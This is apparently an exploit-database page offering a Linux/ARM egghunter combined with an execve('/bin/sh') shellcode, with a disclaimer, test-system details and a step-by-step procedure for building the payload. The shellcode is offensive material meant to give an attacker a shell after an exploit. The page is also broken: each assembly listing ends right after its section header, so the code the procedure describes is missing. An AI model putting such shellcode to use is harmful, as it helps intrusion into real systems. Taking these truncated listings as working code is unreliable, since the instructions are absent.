Exploits / Vulnerability Discovered : 2018-09-24 |
Type : shellcode |
Platform : arm
This exploit / vulnerability Linux/arm egghunter (pwn!) + execve("/bin/sh", null, null) shellcode (28 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
# Title: Linux/ARM - Egghunter (PWN!) + execve("/bin/sh", NULL, NULL) Shellcode (28 Bytes)
# Date: 2018-09-24
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
[Procedure]
(1) Create main shellcode in THUMB state. This PoC's example is execve("/bin/sh", NULL, NULL) shellcode. (20 Bytes)
pi@raspberrypi:~ $ cat shell.s
.section .text
.global _start
(2-a) If your main shellcode is in higher address, use following egghunter. (28 Bytes)
pi@raspberrypi:~ $ cat egghunter-high.s
.section .text
.global _start
(2-b) If your main shellcode is in lower address, use following egghunter. (28 Bytes)
pi@raspberrypi:~ $ cat egghunter-low.s
.section .text
.global _start